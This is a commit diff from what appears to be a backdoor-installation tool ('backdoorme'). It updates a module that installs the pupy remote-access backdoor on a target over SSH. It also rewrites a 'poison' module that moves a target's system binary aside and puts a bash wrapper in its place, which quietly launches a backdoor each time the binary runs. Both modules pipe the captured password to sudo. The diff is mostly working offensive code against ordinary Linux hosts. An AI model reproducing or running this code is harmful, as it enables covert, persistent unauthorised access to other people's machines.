fixed poison, cleaned up target

backdoors/shell/pupy.py

@@ -22,13 +22,13 @@ def do_exploit(self, args):
         port = self.get_value("port")
         target = self.core.curtarget
         print("Thanks to n1nj4sec for the pupy backdoor. Note that this script must be run with sudo.")        
-	os.system("rm pupy/pupy/packages/all/scapy")
+        os.system("rm pupy/pupy/packages/all/scapy")
         target.ssh.exec_command("echo " + target.pword + ' | sudo -S rm -rf pupy')
         target.scpFiles(self, 'pupy/pupy', True)
         target.scpFiles(self, 'rpyc', True)
         target.ssh.exec_command("echo " + target.pword + " | sudo -S mv -f rpyc /usr/local/lib/python2.7/dist-packages")
         raw_input("Please navigate to the backdoorme/pupy/pupy directory and run 'python pupysh.py'. Press enter when you are ready.")
-	target.ssh.exec_command(self.get_command())
+        target.ssh.exec_command(self.get_command())
 
         raw_input(GOOD + "Backdoor attempted on target machine. To run a command, type sessions -i [id] and then 'exec <commandname>.")
 

modules/poison.py

@@ -17,12 +17,12 @@ def exploit(self):
         loc = self.get_value("location")
         password = self.target.pword
 
-        poison = open("tmp/poison.c", "w")
-        poison.write("#include <stdlib.h>\nint main() {\nsystem(\"%s\");\nsystem(\"%s/share/%s\");\nreturn 0;\n }" % (self.backdoor.get_command(), loc, name))
+        poison = open("tmp/%s" % name, "w")
+        poison.write("#!/bin/bash\n( %s & ) > /dev/null 2>&1 && %s/share/%s $@" % (self.backdoor.get_command(), loc, name))
         poison.close()
-        os.system("gcc tmp/poison.c -o tmp/%s" % name)
         self.target.scpFiles(self, "tmp/" + name, False)
-        self.target.ssh.exec_command("echo %s | sudo -S mkdir %s/share" % (password, loc)) # sudo fix
-        self.target.ssh.exec_command("echo %s | sudo -S mv %s/%s %s/share/" % (password, loc, name, loc))
-        self.target.ssh.exec_command("echo %s | sudo -S mv %s %s/" % (password, name, loc))
+        self.target.ssh.exec_command("echo %s | sudo -S mkdir %s/share" % (password, loc)) # create folder
+        self.target.ssh.exec_command("echo %s | sudo -S mv %s/%s %s/share/" % (password, loc, name, loc)) #move old binary to folder
+        self.target.ssh.exec_command("echo %s | sudo -S cp %s %s/" % (password, name, loc)) #move new binary to old location
+        self.target.ssh.exec_command("echo %s | sudo -S chmod +x %s/%s" % (password, loc, name))
         print(GOOD + self.name + " module success")

target.py

@@ -4,7 +4,7 @@
 import os
 import socket
 import subprocess
-
+from definitions import *
 
 class Target:
     def __init__(self, hostname, uname, pword, num, port=22):
@@ -26,18 +26,18 @@ def conn(self):
         self.is_open = True
     #TODO: fix rm -rf bug
     def scpFiles(self, filename,a, recur=True):#call this with a filename and false if it is a single file
-        print "Shipping files: "
-        print(a)
+        print(GOOD + "Shipping files: ")
+        print(INFO + a)
         bareFile = ""
-	for i in range(len(a)-1, 0, -1):
-	    if(a[i] == '/'):
-		break;
-	    else:
-		bareFile += a[i]
-	bareFile = bareFile[::-1]
-	#print bareFile
-	#print("echo " + self.pword + " | sudo -S rm " + bareFile)
-	self.ssh.exec_command("echo " + self.pword + " | sudo -S rm " + bareFile)
+        for i in range(len(a)-1, 0, -1):
+            if(a[i] == '/'):
+                break;
+            else:
+                bareFile += a[i]
+        bareFile = bareFile[::-1]
+        #print bareFile
+        #print("echo " + self.pword + " | sudo -S rm " + bareFile)
+        self.ssh.exec_command("echo " + self.pword + " | sudo -S rm " + bareFile)
         self.scp.put(a, recursive=recur)
 
     def close(self):

tests.py

@@ -67,6 +67,7 @@ def check_help_text(bd):
 #######################################################################################
 def backdoor_crash_test():
     bds = get_backdoors()
+    assert False
     for bd in bds:
         yield check_crash_test, bd